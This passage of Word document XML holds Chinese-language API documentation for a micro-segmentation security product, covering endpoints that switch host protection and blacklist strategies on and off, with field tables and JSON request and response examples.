          <w:p w14:paraId="23BB22D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否是有效主机，yes：可用，no：不可用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="36775EE4" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="319070AF" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>blockingSwitch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D3FB5DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60304296" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>拦截流量开关状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3E3961B7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C8027F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>checkStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B8A3872" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00A46813" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>拦截流量检查状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="56A041D7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3A6687E4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>blackStrategyEnable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A78160A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3BF239CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>黑名单策略开关状态</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D0AC32C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="224" w:name="修改主机开关"/>
      <w:bookmarkEnd w:id="223"/>
      <w:r>
        <w:t>修改主机开关</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EE68AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5532415C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/ms-srv/api/hosts/ms-enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04024D14"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896"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1605"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="3D9C0F7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753B15C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10C80000" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63B4B0DA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25F18585" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4F03C80D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="270B15E3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6F537962" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="70648F39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5CD769D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机id数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="57E5BD83" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F1E72FD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E2E2CB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C75B23C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A436E28" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>开启:1 关闭：0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23A42149" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9DA710" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "agentIds":["5fa27259dae9af8a"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "enabled":0</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1EFDD5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FCB93B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"errorCode": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"errorDesc": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425AF901"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="5402CA1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70F7CC5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68327080" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7212BDA8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="31DB601C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0A0FE280" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E70EB92" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D09F3D0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4E51023D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4802DB3A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30A11DBB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FFE6AB9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="77CB27E0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14CFBF7F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00F21CBE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="634561F0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47C5B310" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="225" w:name="修改黑名单开关"/>
      <w:bookmarkEnd w:id="224"/>
      <w:r>
        <w:t>修改黑名单开关</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06733BDE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCC58F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>POST /external/api/ms-srv/api/hosts/black-strategy-enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737DC0BD"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050"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="2217"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4DE13D2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A57F7AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5BC508E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="30F35F15" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03938851" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="47E6D203" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="54F4D890" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentIds</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5024F7C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3541B973" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="357440CD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机id数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="7F8FA733" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7D139940" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>enabled</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73EB161F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CBC966E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09E3B47C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>开启:true 关闭：false</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="450E4B89" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507491EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    "agentIds":["5fa27259dae9af8a"],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "enabled":true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230EEBB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E74C0CB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"success": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"errorCode": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"errorDesc": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>"data": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3014D6E8"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169"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="3420"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="4311194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A854DBC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5703FBC3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4EDE5935" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="390CB2B7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0203762A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59D8D3AA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E3D199E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否成功，true：成功，false：失败</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6C651A79" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3730FB1C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorCode</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D1E38D6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B775783" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>状态码，0：成功，其他异常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="05922E4E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7DB584A5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>errorDesc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="37AEB556" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="446F86C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>异常描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="540707AE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="226" w:name="微隔离黑名单策略接口"/>
      <w:bookmarkEnd w:id="222"/>
      <w:bookmarkEnd w:id="225"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>微隔离黑名单策略接口</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBE7188" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="227" w:name="查询黑名单策略列表"/>
      <w:r>
        <w:t>查询黑名单策略列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211647A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC76B97" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/ms-srv/api/black-strategy/list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73777A36"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622"/>
        <w:gridCol w:w="1287"/>
        <w:gridCol w:w="1015"/>
        <w:gridCol w:w="6158"/>
      </w:tblGrid>
